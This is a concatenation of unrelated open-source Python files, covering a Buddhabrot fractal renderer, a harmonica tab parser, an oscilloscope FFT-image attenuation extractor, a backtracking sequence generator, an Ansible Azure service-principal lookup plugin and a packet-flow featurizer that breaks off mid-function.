#@jit(locals={'x': numba.float32, 'y': numba.float32, 'n': numba.int32, 'ix': numba.int32, 'iy': numba.int32, 'i': numba.int32 })
@jit
def buddhabrot(NX, NY, NMAX, TMAX):
image_out = np.zeros((NX,NY), dtype=np.float32)
# xy_seq = [(0.0,0.0) for x in range(0, NMAX)]
xy_seq_x = np.zeros(NMAX, dtype=np.float32)
xy_seq_y = np.zeros(NMAX, dtype=np.float32)
n = 0
NX_2 = NX / 2
NY_2 = NY / 2
NX_3 = 0.3 * NX
NY_3 = 0.3 * NY
rnd = np.zeros((TMAX * 2), dtype='f')
#for tt in prange(0, 1000000):
for tt in range(0, 1000000):
if (tt%1000 == 0):
print('iteration ' + str(tt))
#rnd = np.random.rand(TMAX*2)
rnd[:] = np.random.rand(*rnd.shape)
for t in range(0, TMAX):
# Choose a random point in same range.
# x = 6 * random.random() - 3
# y = 6 * random.random() - 3
#x = 6 * np.random.rand() - 3
#y = 6 * np.random.rand() - 3
x = 6 * rnd[t*2] - 3
y = 6 * rnd[t*2+1] - 3
# Determine state of this point, draw if it escapes
ret_val, n_possible = iterate(x, y, n, xy_seq_x, xy_seq_y, NMAX)
if (ret_val):
n = n_possible
for i in range(0, n):
seq_x = xy_seq_x[i]
seq_y = xy_seq_y[i]
#ix = int(0.3 * NX * (seq_x + 0.5) + NX / 2);
#iy = int(0.3 * NY * seq_y + NY / 2);
ix = int(NX_3 * (seq_x + 0.5) + NX_2);
iy = int(NY_3 * seq_y + NY_2);
if ((ix >= 0) and (iy >= 0) and (ix < NX) and (iy < NY)):
image_out[iy][ix] += 1
# Write image.
write_image("buddhabrot_single.png", image_out, NX, NY);
# Image size.
c_NX = 1000
c_NY = 1000
# Lenght of the sequence to test escape status.
# Also known as bailout
c_NMAX = 200
# Number of iterations, multiple of 1 million.
c_TMAX = 10 # 100 # 2000 #1000 # 100
print('CPU_Number: ' + str(multiprocessing.cpu_count()))
start_time = time.time()
buddhabrot(c_NX, c_NY, c_NMAX, c_TMAX)
elapsed_time = time.time() - start_time
print("Elapsed time" + str(elapsed_time))
``` |
{
"source": "joaocarvalhoopen/Harmonica__The_good_kind_of_feedback",
"score": 4
} |
#### File: joaocarvalhoopen/Harmonica__The_good_kind_of_feedback/music_file_parser.py
```python
import re
tab_const_note_duration = 1
def parser_tab_simple_music_file(filename):
""" Input: Only the name of the file_path.
Structure of the return.
list_holes = ( note_name, int(hole_final), tab_const_note_duration, blow_draw, bending_type )
music_score = ('.tab', filename, title, key, list_holes )
return music_score
"""
#filename_path = get_music_directory() + filename
filename_path = filename
data_lines = []
# Open the file for reading but closes automatically the file, even in the case of exception!
with open(filename_path, "r") as file:
data_lines = file.readlines()
if len(data_lines) <= 3:
return ('ERRO', 'Error parsing file, there must be at least 3 lines in the file!')
# TODO: Check if the [1] index in the following lines raises an ERROR when there is no string
# after the ':' in the ".tab" file.
# Reads the title and the key of the harmonica.
# Note: We are presumming that the order of the file is always the same!
title = data_lines[0].split(':')[1]
key = data_lines[1].split(':')[1]
list_holes = []
# print(data_lines)
line_num = 2
for line in data_lines[2:]:
# print(line)
# It has a comment simbol, and it ignores lines started with it so that we can have lyrics in the tab files.
if line.startswith('#'):
line_num += 1
continue
# Ignores the lines that only have white spaces or tabs.
line_tmp = line.lstrip()
if line_tmp == '\n' or line_tmp == '\r\n' or line_tmp == '':
# Note: In this point we can have 2 different types of symbol for ending a line in the file.
# One for Windows and other for Linux, '\r\n' and '\n', there is one lib that is dependent of the OS
# to obtain wich of this line terminators is the correct for our OS!
# I ignore also the empty lines.
line_num += 1
continue
# Remove the line ending character '\r\n' or '\n'.
if line.endswith('\r\n'):
line = line[:-2]
elif line.endswith('\n'):
line = line[:-1]
line= line.rstrip()
line = line.lstrip()
# Remove the duplicate spaces between the holes in the tablature for
# every line.
line = re.sub(' +', ' ', line)
line = re.sub('\t+', ' ', line)
# All notes/holes_are separated by a space.
file_list_holes = line.split(' ')
for hole in file_list_holes:
note_name = hole
blow_draw = 'B'
if hole.startswith('-'):
blow_draw = 'D'
hole = hole[1:]
# Here we should validate whether the hole can have the bending corresponding to one specific Key.
# ( Note: At the moment I am not certain if this changes with the key; I think it can be
# constant for the hole in every key. That is, the note changes but not the position!)
bending_type = 0 # No bendings!
if hole.endswith("'''"):
bending_type = 3
hole = hole[:-3]
elif hole.endswith("''"):
bending_type = 2
hole = hole[:-2]
elif hole.endswith("'"):
bending_type = 1
hole = hole[:-1]
hole_final = 1
#print('line_num: ' + str(line_num) + ' hole: ' + hole + ' note_name: ' + note_name)
if hole in ('0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '10'):
hole_final = hole
else:
return ('ERRO', 'Error at line "{}" "{}" the tab hole must be a num between 0 and 10 !'.format(line_num, note_name))
list_holes.append( ( note_name, int(hole_final), tab_const_note_duration, blow_draw, bending_type ) )
line_num += 1
music_score = ( '.tab', filename, title, key, list_holes )
return music_score
def parser_har_complex_music_file(filename):
data_lines = []
# Open the file for reading but closes automatically the file, even in the case of exception!
with open(filename, "r") as file:
data_lines = file.readlines()
# TODO: Implement!
music_score = ()
return music_score
if __name__ == "__main__":
# filename = 'ode_to_joy_by_beethoven.tab'
filename = 'music_10.tab'
filepath = './/music_for_hamonica//' + filename
music_score = parser_tab_simple_music_file(filepath)
print(music_score)
``` |
{
"source": "joaocarvalhoopen/Oscilloscope_frequency_response_correction_program",
"score": 2
} |
#### File: Siglent_SDS2104_Plus/Extract_attenuation_values_from_scope_FFT_image/extract_attenuation_values_from_scope_fft_image.py
```python
from PIL import Image
import math
import numpy as np
import csv
################
# Configurations
################
fileImgIn = "SDS2354Xplus_2GSa_8bit_1GHz.png"
# Flags that control the drawing of the markings.
flag_mark_4_corners_graph_limits = False # True False
flag_plot_extracted_signal_points = True # True False
flag_mark_left_grid_Y_points = True # True False
flag_mark_bottom_grid_X_points = True # True False
# The hex byte for each R, G, B component of the attenuation graph line color.
signalColorR = 0xB0
signalColorG = 0x14
signalColorB = 0xE8
# The hex byte for each R, G, B component of the color point extracted over
# the graph line.
outputSignalMarkerColorR = 0xFF
outputSignalMarkerColorG = 0xFF
outputSignalMarkerColorB = 0xFF
# The hex byte for each R, G, B component of the color of points of the extended
# first points of the graph line. This points are extended with the 0 dBV reference
# value, like points to the right, the flattest region in the signal graph line.
outputSignalMarkerInitialExtensionColorR = 0xFF
outputSignalMarkerInitialExtensionColorG = 0x00
outputSignalMarkerInitialExtensionColorB = 0x00
# The hex byte for each R, G, B component of the grid Y color point.
outputGrid_Y_MarkerColorR = 0x00
outputGrid_Y_MarkerColorG = 0xFF
outputGrid_Y_MarkerColorB = 0x00
# The hex byte for each R, G, B component of the grid X color point.
outputGrid_X_MarkerColorR = 0x00
outputGrid_X_MarkerColorG = 0xFF
outputGrid_X_MarkerColorB = 0x00
# FFT graph limits corners.
upperLeftX_GraphLimit = 18
upperLeftY_GraphLimit = 49
lowerRightX_GraphLimit = 872
lowerRightY_GraphLimit = 530
minX_GraphLimit = upperLeftX_GraphLimit
maxX_GraphLimit = lowerRightX_GraphLimit
minY_GraphLimit = upperLeftY_GraphLimit
maxY_GraphLimit = lowerRightY_GraphLimit
# Search zones.
upperLeftX = 34
upperLeftY = 110
downRightX = 82
downRightY = 157
zone_1 = (upperLeftX, upperLeftY, downRightX, downRightY)
upperLeftX = 83
upperLeftY = 110
downRightX = 872
downRightY = 530
zone_2 = (upperLeftX, upperLeftY, downRightX, downRightY)
zoneLst = [zone_1, zone_2]
######
# Grid
# Grid Y pixel values (pos Y in pixels, attenuation value in dbV, pixel difference from previous):
posY_dBV_table = [ (104, -12.0, 0),
(164, -14.0, 60),
(224, -16.0, 60),
(285, -18.0, 61),
(345, -20.0, 60),
(405, -22.0, 60),
(465, -24.0, 60),
(525, -26.0, 60),
(585, -28.0, 60)] # Note: The last data point was added by summing the inter
# points delta.
delta_dBV = 2.0
dbVOffset = posY_dBV_table[0][1]
min_Y_dBV_limit = (posY_dBV_table[0][0], posY_dBV_table[0][1] - dbVOffset)
max_Y_dBV_limit = (posY_dBV_table[-1][0], posY_dBV_table[-1][1] - dbVOffset)
# Grid X pixel values (pos X in pixels, frequency in MHz, pixel difference from previous):
bottomLineY = 530
posX_freq_table = [(18, 0.0, 0),
(104, 100.0, 86),
(190, 200.0, 86),
(275, 300.0, 85),
(360, 400.0, 85),
(445, 500.0, 85),
(531, 600.0, 86),
(616, 700.0, 85),
(701, 800.0, 85),
(787, 900.0, 86),
(872, 1000.0, 85)]
delta_freq = 100.0
#####################
# Fixed configuration
#####################
pathImgIn = ".//img_in//"
pathOut = ".//output_out//"
fileImgOut = "output_debug_img.png"
CSVFile_dbVAttenuationTable_OriginalFreq = "dbVAttenuationTable_OriginalFreq_0_to_1_GHz.csv"
CSVFile_dbVAttenuationTable_interpolated_1M_Step = "dbVAttenuationTable_interpol_1M_step_0_to_1_GHz.csv"
CSVFile_dbVAttenuationTable_interpolated_10M_Step = "dbVAttenuationTable_interpol_10M_step_0_to_1_GHz.csv"
# Constants
SHORT_TABLE_MODE = "SHORT_TABLE_MODE"
LONG_TABLE_MODE = "LONG_TABLE_MODE"
longTableHeaderCSV = ["Frequency MHz", "Attenuation dBV", "VoltsScaleFactor",
"Pixel X", "Pixel Y"]
shortTableHeaderCSV = longTableHeaderCSV[ :-2]
###########
# Functions
###########
def getImgInfo(img):
sizeX = img.size[0]
sizeY = img.size[1]
pixels = img.load() # Create the pixel map
return (sizeX, sizeY, pixels)
def processZone(pixelsIn, pixelsOut, zone):
# Extract the pixel points of a zone.
upperLeftX, upperLeftY, downRightX, downRightY = zone
pointPairLst = []
for x in range(upperLeftX, downRightX):
firstPointY = -1
counter = 0
for y in range(upperLeftY, downRightY):
pix = pixelsIn[x, y]
r = pix[0]
g = pix[1]
b = pix[2]
if r == signalColorR and g == signalColorG and b == signalColorB:
if (counter == 0):
firstPointY = y
counter += 1
if counter > 0:
calcY = float(firstPointY) + (float(counter - 1) / 2.0)
pointPairLst.append( [x, calcY] )
# pixelsOut[x, round(y)] = (outputSignalMarkerColorR,
# outputSignalMarkerColorG,
# outputSignalMarkerColorB)
return pointPairLst
def startingPointsExtender(pointsPairLst):
# This function extends the starting points from the first left pixel in "zone 1",
# flat zone with 0 dB reference attenuation all the way to the zero frequency (0 Hz),
# starting graph X position.
startGraphPosX = minX_GraphLimit + 1
firstPoint = pointsPairLst[0]
endValueX, valueY = firstPoint
for x in range(endValueX, startGraphPosX, -1):
pointsPairLst.insert(0, [x, valueY])
return pointsPairLst
def extractSignalPixelPos(pixelsIn, pixelsOut, zoneLst):
# Extract the FFT line plot pixel positions of the PNG image.
lstPointPairs = []
for zone in zoneLst:
zonePoints = processZone(pixelsIn, pixelsOut, zone)
lstPointPairs += zonePoints
return lstPointPairs
def markPointsInOutputImg(pointsPairLst, pixelsOut):
# Add the marking over a copy of the input image for verification
# of correctness, rapid validation to help in development.
# Plot the 4 corners graph limits.
if flag_mark_4_corners_graph_limits == True:
points = [(minX_GraphLimit, minY_GraphLimit),
(minX_GraphLimit, maxY_GraphLimit),
(maxX_GraphLimit, minY_GraphLimit),
(maxX_GraphLimit, maxY_GraphLimit)]
for x, y in points:
pixelsOut[x, round(y)] = (outputSignalMarkerColorR,
outputSignalMarkerColorG,
outputSignalMarkerColorB)
# Plot or mark the extracted signal points.
if flag_plot_extracted_signal_points == True:
firstZone = 0
zone_0_lowerX, _, _ , _ = zoneLst[firstZone]
for pointsPair in pointsPairLst:
x, y = pointsPair
if x < zone_0_lowerX:
# Plot extension in Red color.
pixelsOut[x, round(y)] = (outputSignalMarkerInitialExtensionColorR,
outputSignalMarkerInitialExtensionColorG,
outputSignalMarkerInitialExtensionColorB)
else:
# Plot normal signal in White color.
pixelsOut[x, round(y)] = (outputSignalMarkerColorR,
outputSignalMarkerColorG,
outputSignalMarkerColorB)
# Mark the left grid Y points.
if flag_mark_left_grid_Y_points == True:
x = minX_GraphLimit
for val in posY_dBV_table:
y, dbV, pixelDiff_Y = val
pixelsOut[x, y] = (outputGrid_Y_MarkerColorR,
outputGrid_Y_MarkerColorG,
outputGrid_Y_MarkerColorB)
# Mark the bottom grid X points.
if flag_mark_bottom_grid_X_points == True:
y = maxY_GraphLimit
for val in posX_freq_table:
x, freq, pixelDiff_X = val
pixelsOut[x, y] = (outputGrid_X_MarkerColorR,
outputGrid_X_MarkerColorG,
outputGrid_X_MarkerColorB)
def calculateVoltfactor(dBV):
# 1 V = 0 dBv.
#
# The formula for Volts to dBv conversion is:
#
# dBV = 20 * log10( Volts )
#
# reverse formula for converting dBv to Volts is:
#
# Volts = 10 ^ ( dBV/20 )
voltScaleFactor = math.pow(10.0, dBV / 20.0)
return voltScaleFactor
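# Worked example (a sketch): an attenuation of -3.01 dBV maps to a voltage scale
# factor of 10 ** (-3.01 / 20) ~= 0.7071, i.e. roughly the half-power point.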
def mapToFreq_and_dB(pointsPairLst, pixelsOut):
flag_function_debug = True
mappedOutPutPointsPairLst = []
dB_zero_point = pointsPairLst[zoneLst[0][0] - minX_GraphLimit + 1]
pos_Y_zero_dBV_ref = dB_zero_point[1]
print("pos_Y_zero_dBV_ref: ", str(pos_Y_zero_dBV_ref),
" --> dBV: 0.0 Volts scale factor: 1.0")
if flag_function_debug == True:
r = 0x00
b = 0x00
g = 0xFF
pixelsOut[dB_zero_point[0], pos_Y_zero_dBV_ref] = (r, g, b)
for point in pointsPairLst:
x, y = point
freq = (float(x - minX_GraphLimit) / float(maxX_GraphLimit - minX_GraphLimit) ) * 1000.0
dBV = (float(y - pos_Y_zero_dBV_ref ) / float(max_Y_dBV_limit[0] - min_Y_dBV_limit[0]) ) * ( max_Y_dBV_limit[1] - min_Y_dBV_limit[1] )
voltScaleFactor = calculateVoltfactor(dBV)
tupleVal = [freq, dBV, voltScaleFactor, x, y]
mappedOutPutPointsPairLst.append(tupleVal)
# Print values
# if 480 < freq < 600:
# print(tupleVal)
return mappedOutPutPointsPairLst
def getInterpolated_dB_for_freq(mappedPointsPairLst, freq, flag_print):
# Note:
# -3.01dBV = 0.7071 Volts
xFreqPoints = np.array([point[0] for point in mappedPointsPairLst])
y_dBV_Points = np.array([point[1] for point in mappedPointsPairLst])
# We use the interpolation in dBV and then calculate the Volts scale factor.
# y_VoltsScaleFactor_Points = np.array([calculateVoltfactor(point[1]) for
# point in mappedPointsPairLst])
# y_VoltsScaleFactor_Points = np.array([point[2] for point in mappedPointsPairLst])
# Perform the interpolation.
interp_dBV = np.interp(freq, xFreqPoints, y_dBV_Points)
interp_voltsFactor = calculateVoltfactor(interp_dBV)
#interp_voltsFactor = np.interp(freq, xFreqPoints, y_VoltsScaleFactor_Points)
if flag_print == True:
print("freq:", str(freq), " dBV:", str("%.4f" % interp_dBV), " Volts scale factor:",
str("%.4f" % interp_voltsFactor))
return (freq, interp_dBV, interp_voltsFactor)
def readFromCSVFile(inputPath, fileName):
headerRow = None
outputTable = []
with open(inputPath + fileName, mode='r', newline='') as csvFile:
tableReader = csv.reader(csvFile, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
flag_first_row = True
for row in tableReader:
if flag_first_row == True:
# Reading the header.
headerRow = row
flag_first_row = False
else:
# Reading the data rows.
outputTable.append(row)
print(', '.join(row))
return (headerRow, outputTable)
def writeToCSVFile(mappedPointsPairLst, pathOut, fileName, tableMode):
with open(pathOut + fileName, mode='w', newline='') as tableFile:
tableWriter = csv.writer(tableFile, delimiter=',', quotechar='"',
quoting=csv.QUOTE_MINIMAL )
# Writing the header.
if tableMode == SHORT_TABLE_MODE:
tableWriter.writerow(shortTableHeaderCSV)
elif tableMode == LONG_TABLE_MODE:
tableWriter.writerow(longTableHeaderCSV)
# Writing the rows.
for point in mappedPointsPairLst:
tableWriter.writerow(point)
# freq, dBV, voltsScaleFactor, x, y = point
# tableWriter.writerow([freq, dBV, voltsScaleFactor, x, y])
def calcFixedStepInterpolAttenuationTable(mappedPointsPairLst, freqStep,
freqRange, flag_print):
# Param: freqRange is a tuple "(startFreq, endFreq)".
if flag_print == True:
print("") # Just to add a "\n".
fixedStepTable = []
startFreq = freqRange[0]
endFreq = freqRange[1]
numIntervals = int((endFreq - startFreq + freqStep) / freqStep)
# Extend the range from 0Hz up to 1000MHz, so that interpolation work well.
tmpPointsPairLst = mappedPointsPairLst.copy()
# Insert synthetic 0 MHz with 0.0 dBV value in the begining.
tmpIndex = 0
tmpFreq = 0.0
tmp_dBV = 0.0
tmpPointsPairLst.insert(tmpIndex, [tmpFreq, tmp_dBV])
# Append to the end 1 synthetic data point, 1 MHz past the last real value with -100 dBV.
lastIndex = len(tmpPointsPairLst) - 1
tmpFreq = tmpPointsPairLst[lastIndex][0] + 1.0 # MHz
tmp_dBV = -100.0
tmpPointsPairLst.append([tmpFreq, tmp_dBV])
# Append to the end 1 synthetic data point at 1 GHz with -100 dBV.
tmpFreq = 1000 # MHz
tmp_dBV = -100.0
tmpPointsPairLst.append([tmpFreq, tmp_dBV])
for intervalIndex in range(0, numIntervals):
freq = startFreq + freqStep * intervalIndex
dataPoint = getInterpolated_dB_for_freq(tmpPointsPairLst, freq, flag_print)
fixedStepTable.append(dataPoint)
if flag_print == True:
print("") # Just to add a "\n".
return fixedStepTable
######
# Main
######
if __name__ == "__main__":
# Load the scope PNG image from file.
print("\nStarting...")
imgIn = Image.open(pathImgIn + fileImgIn)
print("...input scope PNG image loaded...\n")
imgOut = imgIn.copy()
# Image In and Out info.
sizeInX, sizeInY, pixelsIn = getImgInfo(imgIn)
sizeOutX, sizeOutY, pixelsOut = getImgInfo(imgOut)
pointsPairLst = extractSignalPixelPos(pixelsIn, pixelsOut, zoneLst)
pointsPairLst = startingPointsExtender(pointsPairLst)
markPointsInOutputImg(pointsPairLst, pixelsOut)
mappedPointsPairLst = mapToFreq_and_dB(pointsPairLst, pixelsOut)
flag_print = True
freq = 430.0 # MHz
val_3dBV = getInterpolated_dB_for_freq(mappedPointsPairLst, freq, flag_print)
freq = 500.0 # MHz
val_3dBV = getInterpolated_dB_for_freq(mappedPointsPairLst, freq, flag_print)
freq = 570.0 # MHz
val_3dBV = getInterpolated_dB_for_freq(mappedPointsPairLst, freq, flag_print)
print("")
writeToCSVFile(mappedPointsPairLst, pathOut,
CSVFile_dbVAttenuationTable_OriginalFreq, LONG_TABLE_MODE)
print("...output CSV graph original freq. attenuation file generated...")
# Note: Uncomment to test the reading of the file.
# CSVFromFiletable = readFromCSVFile( pathOut, CSVFile_dbVAttenuationTable_OriginalFreq)
# print(CSVFromFiletable)
freqStep = 10.0 # MHz
freqRange = (0.0, 1000.0) # MHz
flag_print = False
fixedStep_10M_attTable = calcFixedStepInterpolAttenuationTable(mappedPointsPairLst,
freqStep, freqRange, flag_print)
writeToCSVFile(fixedStep_10M_attTable, pathOut,
CSVFile_dbVAttenuationTable_interpolated_10M_Step, SHORT_TABLE_MODE)
print("...output CSV 10 MHz step interpolated attenuation (0 Hz to 1GHz) file generated...")
freqStep = 1.0 # MHz
freqRange = (0.0, 1000.0) # MHz
flag_print = False
fixedStep_1M_attTable = calcFixedStepInterpolAttenuationTable(mappedPointsPairLst,
freqStep, freqRange, flag_print)
writeToCSVFile(fixedStep_1M_attTable, pathOut,
CSVFile_dbVAttenuationTable_interpolated_1M_Step, SHORT_TABLE_MODE)
print("...output CSV 1 MHz step interpolated attenuation (0 Hz to 1GHz) file generated...")
    # Write the extracted-points validation image (the processed scope output PNG) for debugging.
imgOut.save(pathOut + fileImgOut)
print("...output extracted points validation scope processed PNG image file generated...")
print("...end\n")
``` |
{
"source": "joaocarvalhoopen/The_BackTracking_Algorithm",
"score": 4
} |
#### File: joaocarvalhoopen/The_BackTracking_Algorithm/sequence_generator.py
```python
import numpy as np
MAX_SEQUENCE_LENGTH = 4
SEQUENCE_ELEMENTS = ['A', 'B', 'C']
def printSequences(state, message):
print("\n" + message + "\n")
for seq in state:
# for i in range(0, MAX_SEQUENCE_LENGTH):
# print(seq[i], end='')
# if i == MAX_SEQUENCE_LENGTH-1:
# print()
print("".join(seq.tolist()))
def isSequenceStateConstrainsSatisfied(index, state):
    # Check the constraints.
    # Because we build the solution incrementally and the previous state
    # (the sequence so far) is already valid and conflict-free, we only
    # need to check that the current value is not equal to the previous value.
# Check if not equal to previous value.
if (index > 0):
if state[index - 1] == state[index]:
return False
return True
def solve(index_in, state, allSequenceSolution):
# Establish the stopping GOAL.
if index_in >= MAX_SEQUENCE_LENGTH:
allSequenceSolution.append(state.copy())
return True
# Give all the CHOICES to experiment incrementally.
newState = state.copy()
for choice in SEQUENCE_ELEMENTS:
newState[index_in] = choice
        # Validate the choice against the CONSTRAINTS.
if not isSequenceStateConstrainsSatisfied(index_in, newState):
# Removes the previous choice.
newState[index_in] = '_'
continue
# if valid, incrementally build the next solution phase.
solve(index_in + 1, newState, allSequenceSolution)
# Removes the previous choice.
newState[index_in] = '_'
if __name__ == "__main__":
print("\n######################################")
print( "# Sequence generator with constrains #")
print( "######################################")
    # The '_' marks the places where we will put a sequence element!
sequenceLst = []
for i in range(0, MAX_SEQUENCE_LENGTH):
sequenceLst.append('_')
sequence = np.array(sequenceLst)
printSequences([sequence], "Empty sequence...")
index = 0
allSequenceSolution = []
solve(index, sequence, allSequenceSolution)
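    # With 3 symbols and length 4, the no-equal-neighbours constraint leaves 3 * 2**3 = 24 valid sequences.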
printSequences(allSequenceSolution, "All valid sequences...")
``` |
{
"source": "joaocc/azure_preview_modules",
"score": 2
} |
#### File: azure_rm_keyvaultsecret/lookup_plugins/azure_service_principal_attribute.py
```python
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = """
lookup: azure_service_principal_attribute
requirements:
- azure-graphrbac
author:
- <NAME> <<EMAIL>>
version_added: "2.7"
short_description: Look up Azure service principal attributes.
description:
- Describes object id of your Azure service principal account.
options:
azure_client_id:
description: azure service principal client id.
azure_secret:
description: azure service principal secret
azure_tenant:
description: azure tenant
azure_cloud_environment:
description: azure cloud environment
"""
EXAMPLES = """
set_fact:
object_id: "{{ lookup('azure_service_principal_attribute',
azure_client_id=azure_client_id,
azure_secret=azure_secret,
                         azure_tenant=azure_tenant) }}"
"""
RETURN = """
_raw:
description:
Returns object id of service principal.
"""
from ansible.errors import AnsibleError
from ansible.plugins import AnsiblePlugin
from ansible.plugins.lookup import LookupBase
from ansible.module_utils._text import to_native
try:
from azure.common.credentials import ServicePrincipalCredentials
from azure.graphrbac import GraphRbacManagementClient
from msrestazure import azure_cloud
from msrestazure.azure_exceptions import CloudError
except ImportError:
raise AnsibleError(
"The lookup azure_service_principal_attribute requires azure.graphrbac, msrest")
class LookupModule(LookupBase):
def run(self, terms, variables, **kwargs):
self.set_options(direct=kwargs)
credentials = {}
credentials['azure_client_id'] = self.get_option('azure_client_id', None)
credentials['azure_secret'] = self.get_option('azure_secret', None)
credentials['azure_tenant'] = self.get_option('azure_tenant', 'common')
if credentials['azure_client_id'] is None or credentials['azure_secret'] is None:
raise AnsibleError("Must specify azure_client_id and azure_secret")
_cloud_environment = azure_cloud.AZURE_PUBLIC_CLOUD
        if self.get_option('azure_cloud_environment', None) is not None:
            _cloud_environment = azure_cloud.get_cloud_from_metadata_endpoint(self.get_option('azure_cloud_environment'))
try:
azure_credentials = ServicePrincipalCredentials(client_id=credentials['azure_client_id'],
secret=credentials['azure_secret'],
tenant=credentials['azure_tenant'],
resource=_cloud_environment.endpoints.active_directory_graph_resource_id)
client = GraphRbacManagementClient(azure_credentials, credentials['azure_tenant'],
base_url=_cloud_environment.endpoints.active_directory_graph_resource_id)
response = list(client.service_principals.list(filter="appId eq '{0}'".format(credentials['azure_client_id'])))
sp = response[0]
return sp.object_id.split(',')
except CloudError as ex:
raise AnsibleError("Failed to get service principal object id: %s" % to_native(ex))
return False
``` |
{
"source": "joaoceron/NetDetect",
"score": 3
} |
#### File: MinimumFeaturizer/scripts/featurize_flows.py
```python
import sframe as sf
def generate_flows(input_url='data/scored_packets.csv', output_url="data/raw_flows.csv"):
'''
Generate raw network flows from a list of captured packets
'''
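  # A flow is keyed by an order-independent 5-tuple of addresses, ports and protocol, so both directions of a conversation share the same UFid.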
def __flow_id(x):
if x['Source'] > x['Destination']:
return x['Source'] + '-' + x['Destination'] + '-' + str(x['Source Port']) + '-' + str(x['Destination Port']) + '-' + str(x['Protocol'])
else:
return x['Destination'] + '-' + x['Source'] + '-' + str(x['Destination Port']) + '-' + str(x['Source Port']) + '-' + str(x['Protocol'])
sorted_flow = sf.SFrame.read_csv(input_url, verbose=False)
sorted_flow = sorted_flow[(sorted_flow['Source Port'] != '') & (sorted_flow['Destination Port'] != '')]
sorted_flow['tcp_Flags'] = sorted_flow['tcp_Flags'].apply(lambda x: int(x, 16) if x != '' else 0)
sorted_flow['UFid'] = sorted_flow.apply(lambda x: __flow_id(x))
sorted_flow = sorted_flow.sort(['UFid', 'Time'])
packet_flow_memberships = []
current_flow = 0
current_ufid = None
start_time = None
for row in sorted_flow:
if current_ufid is None:
if start_time is None:
start_time = row['Time']
packet_flow_memberships.append(current_flow)
current_ufid = row['UFid']
elif (row['UFid'] == current_ufid):
# Terminate connection.
if row['tcp_Flags'] & 1:
packet_flow_memberships.append(current_flow)
current_ufid = None
start_time = None
current_flow += 1
# Time-outs
# elif row['Time'] - startTime >= 360000:
# current_flow_id = current_flow_id + 1
# Flow.append(current_flow_id)
# prev_flow_id = None
# startTime = row['Time']
else:
packet_flow_memberships.append(current_flow)
current_ufid = row['UFid']
else:
current_flow = current_flow + 1
packet_flow_memberships.append(current_flow)
current_ufid = row['UFid']
start_time = row['Time']
sorted_flow['FlowNo.'] = sf.SArray(packet_flow_memberships)
sorted_flow.save(output_url)
def featurize_flows(input_url="data/raw_flows.csv", output_url="data/featurized_flows.csv"):
'''
Featurize network flows generated by generate_flows
'''
def __is_packet_null(x):
if (x['TCP Segment Len'] == '0' or x['udp_Length'] == 8):
return 1
elif ('ipx' in x['Protocols in frame'].split(':')):
l = x['Length'] - 30
if ('eth' in x['Protocols in frame'].split(':')):
l = l - 14
if ('ethtype' in x['Protocols in frame'].split(':')):
l = l - 2
if ('llc' in x['Protocols in frame'].split(':')):
l = l - 8
if (l == 0 or l == -1):
return 1
return 0
flow_list = sf.SFrame.read_csv(input_url, verbose=False)
# Add time feature, giving initial timestamp of the flow
# Use initial timestamp to fetch only first packets
FIRST_PACKETS = flow_list.join(flow_list.groupby(['FlowNo.'], {'Time': sf.aggregate.MIN('Time')}), on=['FlowNo.', 'Time'])[['FlowNo.', 'Length']].unique()
flow_list = flow_list.join(FIRST_PACKETS.groupby(['FlowNo.'], {'FirstPacketLength': sf.aggregate.AVG('Length')}), on='FlowNo.')
del(FIRST_PACKETS)
# Count number of packets per flow
flow_list = flow_list.join(flow_list.groupby(['FlowNo.'], {'NumberOfPackets': sf.aggregate.COUNT()}), on='FlowNo.')
# Total number of bytes exchanged
flow_list = flow_list.join(flow_list.groupby(['FlowNo.'], {'NumberOfBytes': sf.aggregate.SUM('Length')}), on='FlowNo.')
# Standard deviation of packet length
flow_list = flow_list.join(flow_list.groupby(['FlowNo.'], {'StdDevOfPacketLength': sf.aggregate.STDV('Length')}), on='FlowNo.')
  # Proportion of packets with the same length
flow_list = flow_list.join(
flow_list.groupby(['FlowNo.'], {
'RatioOfSameLengthPackets': sf.aggregate.COUNT_DISTINCT('Length') * 1.0 / sf.aggregate.COUNT()
}), on='FlowNo.')
# Calculate duration of flow
flow_list = flow_list.join(
flow_list.groupby(['FlowNo.'], {
'Duration': sf.aggregate.MAX('Time') - sf.aggregate.MIN('Time')
}), on='FlowNo.')
# Calculate average packets per second
flow_list['AveragePacketsPerSecond'] = flow_list.apply(lambda x: x['Duration'] if x['Duration'] == 0.0 else (x['NumberOfPackets'] * 1.0 / x['Duration']))
# Calculate number of bits per second
flow_list['AverageBitsPerSecond'] = flow_list.apply(lambda x: 0.0 if x['Duration'] == 0.0 else (x['NumberOfBytes'] * 8.0 / x['Duration']))
# Calculate average packet length
flow_list = flow_list.join(flow_list.groupby(['FlowNo.'], {'AveragePacketLength': sf.aggregate.AVG('Length')}), on='FlowNo.')
# Calculate null packets
flow_list['IsNull'] = flow_list.apply(lambda x: __is_packet_null(x))
# Calculate total number of null packets
flow_list = flow_list.join(flow_list.groupby(['FlowNo.'], {'NumberOfNullPackets': sf.aggregate.SUM('IsNull')}), on='FlowNo.')
# Added number of forward packets
flow_list['Forward'] = flow_list.apply(lambda x: 1 if x['Source'] > x['Destination'] else 0)
flow_list = flow_list.join(flow_list.groupby('FlowNo.', {'NumberOfForwardPackets': sf.aggregate.SUM('Forward')}), on='FlowNo.')
# Update flows
flow_list = flow_list.groupby('FlowNo.', {
'Score': sf.aggregate.SELECT_ONE('Score'),
'Destination': sf.aggregate.SELECT_ONE('Destination'),
'Destination Port': sf.aggregate.SELECT_ONE('Destination Port'),
'Source': sf.aggregate.SELECT_ONE('Source'),
'Source Port': sf.aggregate.SELECT_ONE('Source Port'),
'IP_Flags': sf.aggregate.SELECT_ONE('IP_Flags'),
'Length': sf.aggregate.SELECT_ONE('Length'),
'Protocol': sf.aggregate.SELECT_ONE('Protocol'),
'Protocols in frame': sf.aggregate.SELECT_ONE('Protocols in frame'),
'udp_Length': sf.aggregate.SELECT_ONE('udp_Length'),
'tcp_Flags': sf.aggregate.SELECT_ONE('tcp_Flags'),
'Time': sf.aggregate.SELECT_ONE('Time'),
'TCP Segment Len': sf.aggregate.SELECT_ONE('TCP Segment Len'),
'FirstPacketLength': sf.aggregate.SELECT_ONE('FirstPacketLength'),
'NumberOfPackets': sf.aggregate.SELECT_ONE('NumberOfPackets'),
'NumberOfBytes': sf.aggregate.SELECT_ONE('NumberOfBytes'),
